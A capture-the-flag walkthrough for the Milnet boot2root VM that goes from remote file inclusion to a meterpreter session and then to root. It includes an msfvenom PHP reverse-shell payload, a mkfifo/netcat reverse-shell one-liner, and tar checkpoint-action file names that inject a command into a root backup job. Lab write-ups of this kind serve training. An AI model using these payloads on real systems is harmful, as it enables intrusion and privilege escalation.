Hack the Milnet VM (CTF Challenge)

This is a boot2root challenge which we will try to complete. This VM is created by Warrior and is a basic exploitable VM so we do not need to worry about any advance exploits and reverse engineering.
As always start off by locating the target with the following command:

Our target is Now we will scan our target with nmap to know all about its ports.
nmap  -A -p-

To know more about our target we will use nikto.
nikto -h

As you can see we did not acquire much information from nikto so let us open it on our browser, maybe we can find something from there.
Looking into the page source and all the tabs on the left side we could not find anything. So we explored and searched allot and we found remote file inclusion vulnerability. Upon finding the said vulnerability our step was clear i.e. we had use Tamper data.
So go to Tools on menu bar and select Tamper data

When the Tamper Data opens click on Start Tamper.

Then click on main button, a dialog box will open and from this dialog box click on Tamper.

Now generate the php code with the help of which we will have our meterpreter session and to generate the code type:
msfvenom php/meterpreter/reverse_tcp lhost=192.1680.103 lport=4444 -f raw
Copy the code from <?php to die() and save it on the file with extension .php. After the file is saved, transfer the file to var/www/html
Then on Tamper Data give the path of the file without the extension in the text box adjacent to route. For example type:

Before clicking on OK run metasploit and type:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost
set lport 4444
And when you click on ok you will have your meterpreter session. You can type the following command to get the information of the system:
Then you type the set of following commands to reach the terminal:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
Now that we are in the terminal, we wil look for the version of kernel to know wheather its vulnerbale or not and ofr that type:
lsb_release -a
As you can see, kernel’s version is not exploitable. So we searched and looked for any other option which could help us gain root’s access. And so we looked in to the /passwd with the following command
cat /etc/passwd
This file will show the name of user langman and we switched our user to langman. So we checked the user on home by typing:
cd home
And then we switched:
cd langman
Then check the list of thing present in langman by typing :
There is only one folder available so let’s go into it.
ls(to check the contents of SDINET)
Here, in SDINET you will find a text file which will show you all the steps to move ahead. It contains unix wildcard attacks.


Some further digging revealed that crontab was running a backup script as root, which used tar to compress the contents of /var/www/html. One of the attacks mentioned in the text document covered tar. The commands we used are:
cat /etc/crontab
cat /backup/backup.sh

Now we will open an additional listener for our attack. And for that open the terminal of Kali on the side and type:
nc -lvp 443

This will help us to achieve arbitrary command execution stemming from the tar command within the backup.sh script.
Next we ran the following commands:
echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 443 >/tmp/f” > shell.sh
touch “/var/www/html/–checkpoint-action=exec=sh shell.sh”
touch “/var/www/html/–checkpoint=1”
The above commands help the tar command to run the file, shell.sh after the first file is archived. Since the backup.sh script is running as root, this has the effect of spawning a netcat shell and sending it to the attack platform on port 443.
And if you go back to the terminal window where the listener was on.

And BAM!! The Flag is captured!!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast